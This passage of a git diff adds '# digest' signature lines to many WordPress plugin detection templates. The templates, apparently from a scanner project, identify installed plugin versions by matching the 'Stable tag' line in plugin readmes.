4a0a004730450220576a77f271e6c77bf1a0f7dcae313e7ac0150c7863130dfa48e7187edbe8e8de0221008c8f5416e5c11d4a66448031c8e021048d6e7c7b4ffd6855449543c4ad763869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..2154722e77 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204245e3537ae65ffe439141391ac98db5588c21ae6ca1b3f283ec62d9966c2a4302207c118c3448a28fdc5bcbf9e32eb3f2097fcd3d47da527eaf6c8b5da4b75aea12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..f714f42e9b 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100edd00e872b4fd8b23455c0c836c757467f25d0b19ee92efe5aee2c60dbc23c3102202990fa8985e2d5e31ae71632fc79b4a72c84b1fa449e15eea70a3771a07a0c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..ba37203404 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f5275ab01d7d99708da7743dac51f1e13291d73dbfbcf39002d6f83d78ca04c0221009de4840ffc27da8560af6241ea2cee0979569eaa4bd11877a19291b99055671f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..4fec1f83c4 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002cac0ae3b26547fa4912df6fb8aeb94b80752c1e8a34ed9b824edb4db3d1f5a0221008548bf5bdde96b643d74a6c58225d81dec20c54bf145643ffe908ade0f166ac5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..510c32a0c3 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d11710fd3e2c4c1b743b29b23076d1e83f35bd475b94265ab1223b4bf10193a40220704b8094566b195c2de575a86a7628975710bfe856d20435aaf92b4aedb43e63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..3ed4f952b8 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f854e6f3ba078790f0dc217e18fcd028548d4a89024a4431d0bcbd4fcb8908b022100a324f66b72687b4eb1da9e8acfaf953838e9deed063bcf8a9acdb12a8d760f0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..a25837a19d 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210093d45f50b6cca30dae204dbcf56b679a3ec6a38e688e2507578a0cf7c135de0002205e357863f87edb024bf7dffa76a18f5b54333550399673e2e78f4807ca072261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..541afc2460 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dcdf336d1b305fb8c09a81eee2018e6ce9abe6731eebac2083dca770ad2e3b1d02202efdfdecab30f4d6cbafc544a6c039f799ce9bd34635a4d9e8e860b8ef8714ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..a02dea0f42 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d1bc6842ba41bb70a11a67855c815f06ccee45a16c9088c1c082ac35e8cc74020221009b9e9d426c3e0008569b67480a26c87e2bcd39b37c37af5c2ec63b8151354bd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..a60bf1c497 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e3a723ba73a585330f82123d1a041a5117dc851ad9fd051a382e2fd541a957202210089dc70be0a9595db26aa0098d4b3ceeea947caf6bb21b4903e6bdecea566d580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..7b1d8eb6f9 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206ac07658d02b16275333b444c7308876ad54017ed816d3741eb4f2d4026e73b902200aafaf336f396c7e72f823fe2a45531aeb43ca2e0ad1e7bd4f8ecf97858d4035:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..c0a9d68f6f 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008ac77842d61c0372ba90f39c176a8f620f1ec9aba55326c31987f58cc26dc3c1022100d319be8b20344803c23e5f30a7d660f337054df081ffe88aa222be144913b2af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..829875d5da 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dea42135dc0cef329688b846379d12f2c4d49f7706ff9e1763b80a53871fe4ba022100ca66c318baafc329fda13daa868d63babc928f616171ee238d4a2b1a3002ca58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..e653706864 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201adacfdcd4e33746b16e53f964046217c2094a46717d643d5c187982aed659f2022100ea5930c2c9780ec86819b99e4ee670b84e4e64457ba89c97a5efa66714f5bd99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..debcc26735 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100de1656484a9f956636a1d1eb96713311e6780a4d4e5ed0a81ab4196b4900dfb902205c40454a370b0cfc82b8575fb3493ff941d5f6cc0d714941f9fbccf1ea964504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..8cdd46dbe1 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202694e5658c35a1fb77f7ae1af7ab0f5a8d1b896e1744ed2f8ed04e25efc4a347022100ff187d29134fc2a8c930c8aed9d233f38826f1fdf572f88feb4325670fbd0401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..f7a3719413 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202418e3926c9e835f78a6be769ca46e3ce6ab318ab7eb8763b80240808d6b157e02201f09b7617a07a0e4adf4fc9ddd248471b8375afe7cc7b3d7e488c441f57bcb53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..6ce11d6d2b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202218ba32a3ccb00d2094c20ef76df9f1d164b87069c54cd82d34c0a63ff032df022100c3ce79e8fb3b0a510512abfe7a882e634feac7d2ab7611cafb2b967f6be8aaee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..6c5c85ec48 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100898a4dd5b85370b112e9e86fc1dcceac61588af1249b1a4fdedc0c0b278b3c3d02201322a4d0a7e007bf612fae02cafd82301002d27c8237c74498cf4602a9314a72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..ef5b33d83e 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071dd3a4523bb11b37a7ebe2ea8adc4f531d657ea9c5f267eb52fc78bee9979f002203e28dff596a550d803b6c3a08b6665fe462fe22b73e49fdbc3cc3916f4cb7606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..89cf373fc2 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b392a3ae25fc57ea403fbf537ed920c5be31e399faa81a164ed2e126c7fe2f7b022100bfe644fd86f7ec722359dfec65e202d4ef5b62495956378f6d118972c4360d2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..c16a900308 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024529c8e5fce8822d5d8d7f85617c9ec10532e9e4acb3be09fb7488cf95fdf6b022045c9f23d440beaf2561709d87775a5359aec944a622b000da8401224f73105b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..dc58900d9e 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf82a138c333f90eef4947f89950bafc59d3b9d8660f831e21808518cd58b30902210091080c1a4b481e4670385ff4961146afd90e89d9f4b4a34cf4da5c20be58dc94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..542ccd0e3b 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202f783b069aebd749943fdd17b1c09b3b1f6aec0f02af35d129b83a64745984ee022051cc821a5ac78c9ec796b117c46eacfd34536b1b46c0df20fc3272e5e6205458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..cde93efa9d 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb160d839a58d460f5274481f2016a13bcccbd49d7d9bfddfdbfb5e392c63194022100864a76ceb118b069e17a9e2fd46a31f9a9ab5b1e3bbfebee25baf27ffddaac84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..6e32a4581b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e52d527dd798bd5041964c2831668f2bc7b1f7ae6224ccf322799bdf024e0b7022014be409a402c85abbce8efe6d7418cdbe289d042ef38682ac0745a66e91a1b5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..cd14406c3e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d784064e16bbb54cb1cb1068058c22865d4e2d75628f47f632ed445c1955f1600220455fa638c442fc99730f693a288f43479c9ab267623827fce22459fe02c3bc78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..c0ac7da6f9 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b50a25250c6ce3bb12c50b1fd4a649f9f6c116fefcb3ce9f792855ad07e31dfb02203fc553648fd43e2649dc4b57457ba792d869ae086756018aa0e01719a9b2c409:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..62cfe1c613 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f6e9d51561e354f27e4971f90f8ce8fd3c82a5675f6399a6a17cfc1c6ed6ccf022100eee717e948708f924d53de65f5764e267aa546abe6da6dcbce082a71ca4238b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..842da10f34 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022059bb7426d1f554faa9eb60f936b40b0622c44a20979038f80bfff3e5c00453530220218244ebd3915d7b9879ad1c5ca0b2576df3b1eb87d7c5ea4012ed3fb1a2bb31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..6c361c6b1a 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022012584d80ba20be4fe1ce12af2e095fa3d72af2c89c212199effa8bad42416004022045ab5e82b5857c6f194258de4fb6bc900e267abb08c857857f3846719838cc4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..31a4cb9ceb 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022070905cd60a9586159dd940a0779ae3cf43223d67046b111019c8d9e290b8765d02210090037a612a16e8554e49f99b665e25cc7b551233523063bf26da67ce8476ba4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..d12099d385 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e3a47d67c9abe199207336e1bf7aad5e4768b7adac575568a622d21335eff9e022100be76dc1c38413da40cd54f437b37c8a6ce2f3e0d8ae013fa1f9fc5572f0e62f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..54e4ea9529 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da72c56e29cd9e2045551a56e60f4b52cf8b0d5221372a2f77ba070b98361e6902202db0fb7ee8a1b9ef327a7c6693200969d46691a9e38d2c0acd6e341b6d242c35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..5be73aa871 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f6de4e57051788f4d4f8e04d8f8597398ce8e8446fd2319f41d252448c111c9902201c859fd6d4720760b2e1d6705a8a0c6ee668cfb5a195cb5321c28861d7a8f58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..b553a7fb4e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220179691bdf9cea0dee7cf65031fee9a13a8581bafe0250445959e777d0be03fe8022100fa170dd4680bcef0ce37fb8681971157ece67465ecec5183e382cf0f45ce3936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..d95e20ee85 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e6a3435b0c6158d749b4194d2eae99256f092dede8a37273e51256dfdd37f9402210099aa682ba65630b3b9398251862b9c18870ed531d7e03190174de0339043cb56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..b694be4746 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d3de41fee416b472011b7c5c4bfd90112db9ee53649123a03ca670d5bdb9a5e0022100b66ac7274857ce48c064dbdb0d24dc5e4450297b5d26d3cd7e36a51288ef008f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..fb7dc97b45 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b07a2a7a5ef009173b7c995bd32825c3ead87345df3bf7bb8b1d0f6d1909d2e902204cec7badb524fcd652cb008e4f63c3d4fd203f387464511e48be3c458f655a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..b56254fe0e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068b1df2670abcbaf995e272727ba0e755bbd1ca7aeb3fc1c9c7662b6d7502d7a0220518d080be076250498c47126618c286714fe65aaa340f45424e06ba241aa104c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..ec77ae1751 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db830fa5925a209119f671ca54eff21d3bc6cd2638f8c33d069bc924ffd792c002203a81f1f4d1a45f791174a2245a5bc64f03d3ae427a4591b319587b5071610081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..21d0363fe4 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022027fd270bbbeb5000c25893ebde8a39e09cbad5f4a27366b297d2fca47522e6c7022100a92711c56e4129f340bbfab6dee26098b04b11041694dd1ad31aac205758feb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..07df724447 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100810cabacd2bb106635ef9a5df3e6a5cb8bfc74c9695d80dda077a070a26ec010022100eea3bf99c5a81e5c18cff7b931f9b4775369c318eac8d94663a3f1addd09ead9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..817d880b4f 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bca9a31a10f2b8bcde896dfafc196ecbdd4f605e819370704c141ace3daf0b71022100a3579513b2228034e89b43a721182d2fe5fab07d7a7f6222d29c45b3cd5eeac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..81396be0e3 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b646fc45e9eee4501b0bec6bfa590de66d87b81b9f4d4319675cc3d2d1d7f215022100c0c45a3856802758a3ccf4a9b307abe1cfd31654ec1974b465c9bd87b85183f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..7df074fc54 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 